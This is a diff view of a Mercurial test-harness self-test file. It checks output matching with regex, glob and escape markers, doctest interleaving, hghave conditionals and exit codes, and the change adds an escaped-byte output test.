9 oh no (no-eol)
9 oh no (no-eol)
10 $ printf 'bar\nbaz\n' | cat
10 $ printf 'bar\nbaz\n' | cat
11 bar
11 bar
12 baz
12 baz
13
13
14 Multi-line command:
14 Multi-line command:
15
15
16 $ foo() {
16 $ foo() {
17 > echo bar
17 > echo bar
18 > }
18 > }
19 $ foo
19 $ foo
20 bar
20 bar
21
21
22 Return codes before inline python:
22 Return codes before inline python:
23
23
24 $ sh -c 'exit 1'
24 $ sh -c 'exit 1'
25 [1]
25 [1]
26
26
27 Doctest commands:
27 Doctest commands:
28
28
29 >>> from __future__ import print_function
29 >>> from __future__ import print_function
30 >>> print('foo')
30 >>> print('foo')
31 foo
31 foo
32 $ echo interleaved
32 $ echo interleaved
33 interleaved
33 interleaved
34 >>> for c in 'xyz':
34 >>> for c in 'xyz':
35 ... print(c)
35 ... print(c)
36 x
36 x
37 y
37 y
38 z
38 z
39 >>> print()
39 >>> print()
40
40
41 >>> foo = 'global name'
41 >>> foo = 'global name'
42 >>> def func():
42 >>> def func():
43 ... print(foo, 'should be visible in func()')
43 ... print(foo, 'should be visible in func()')
44 >>> func()
44 >>> func()
45 global name should be visible in func()
45 global name should be visible in func()
46 >>> print('''multiline
46 >>> print('''multiline
47 ... string''')
47 ... string''')
48 multiline
48 multiline
49 string
49 string
50
50
51 Regular expressions:
51 Regular expressions:
52
52
53 $ echo foobarbaz
53 $ echo foobarbaz
54 foobar.* (re)
54 foobar.* (re)
55 $ echo barbazquux
55 $ echo barbazquux
56 .*quux.* (re)
56 .*quux.* (re)
57
57
58 Globs:
58 Globs:
59
59
60 $ printf '* \\foobarbaz {10}\n'
60 $ printf '* \\foobarbaz {10}\n'
61 \* \\fo?bar* {10} (glob)
61 \* \\fo?bar* {10} (glob)
62
62
63 Literal match ending in " (re)":
63 Literal match ending in " (re)":
64
64
65 $ echo 'foo (re)'
65 $ echo 'foo (re)'
66 foo (re)
66 foo (re)
67
67
68 Windows: \r\n is handled like \n and can be escaped:
68 Windows: \r\n is handled like \n and can be escaped:
69
69
70 #if windows
70 #if windows
71 $ printf 'crlf\r\ncr\r\tcrlf\r\ncrlf\r\n'
71 $ printf 'crlf\r\ncr\r\tcrlf\r\ncrlf\r\n'
72 crlf
72 crlf
73 cr\r (no-eol) (esc)
73 cr\r (no-eol) (esc)
74 \tcrlf (esc)
74 \tcrlf (esc)
75 crlf\r (esc)
75 crlf\r (esc)
76 #endif
76 #endif
77
77
78 Escapes:
79
80 $ $PYTHON -c 'from mercurial.utils.procutil import stdout; stdout.write(b"\xff")'
81 \xff (no-eol) (esc)
82
83 Escapes with conditions:
84
85 $ $PYTHON -c 'from mercurial.utils.procutil import stdout; stdout.write(b"\xff")'
86 \xff (no-eol) (esc) (true !)
87
78 Combining esc with other markups - and handling lines ending with \r instead of \n:
88 Combining esc with other markups - and handling lines ending with \r instead of \n:
79
89
80 $ printf 'foo/bar\r'
90 $ printf 'foo/bar\r'
81 fo?/bar\r (no-eol) (glob) (esc)
91 fo?/bar\r (no-eol) (glob) (esc)
82 #if windows
92 #if windows
83 $ printf 'foo\\bar\r'
93 $ printf 'foo\\bar\r'
84 foo/bar\r (no-eol) (esc)
94 foo/bar\r (no-eol) (esc)
85 #endif
95 #endif
86 $ printf 'foo/bar\rfoo/bar\r'
96 $ printf 'foo/bar\rfoo/bar\r'
87 foo.bar\r [(]no-eol[)] (re) (esc)
97 foo.bar\r [(]no-eol[)] (re) (esc)
88 foo.bar\r \(no-eol\) (re)
98 foo.bar\r \(no-eol\) (re)
89
99
90 testing hghave
100 testing hghave
91
101
92 $ hghave true
102 $ hghave true
93 $ hghave false
103 $ hghave false
94 skipped: missing feature: nail clipper
104 skipped: missing feature: nail clipper
95 [1]
105 [1]
96 $ hghave no-true
106 $ hghave no-true
97 skipped: system supports yak shaving
107 skipped: system supports yak shaving
98 [1]
108 [1]
99 $ hghave no-false
109 $ hghave no-false
100
110
101 Conditional sections based on hghave:
111 Conditional sections based on hghave:
102
112
103 #if true
113 #if true
104 $ echo tested
114 $ echo tested
105 tested
115 tested
106 #else
116 #else
107 $ echo skipped
117 $ echo skipped
108 #endif
118 #endif
109
119
110 #if false
120 #if false
111 $ echo skipped
121 $ echo skipped
112 #else
122 #else
113 $ echo tested
123 $ echo tested
114 tested
124 tested
115 #endif
125 #endif
116
126
117 #if no-false
127 #if no-false
118 $ echo tested
128 $ echo tested
119 tested
129 tested
120 #else
130 #else
121 $ echo skipped
131 $ echo skipped
122 #endif
132 #endif
123
133
124 #if no-true
134 #if no-true
125 $ echo skipped
135 $ echo skipped
126 #else
136 #else
127 $ echo tested
137 $ echo tested
128 tested
138 tested
129 #endif
139 #endif
130
140
131 Exit code:
141 Exit code:
132
142
133 $ (exit 1)
143 $ (exit 1)
134 [1]
144 [1]
General Comments 0
You need to be logged in to leave comments. Login now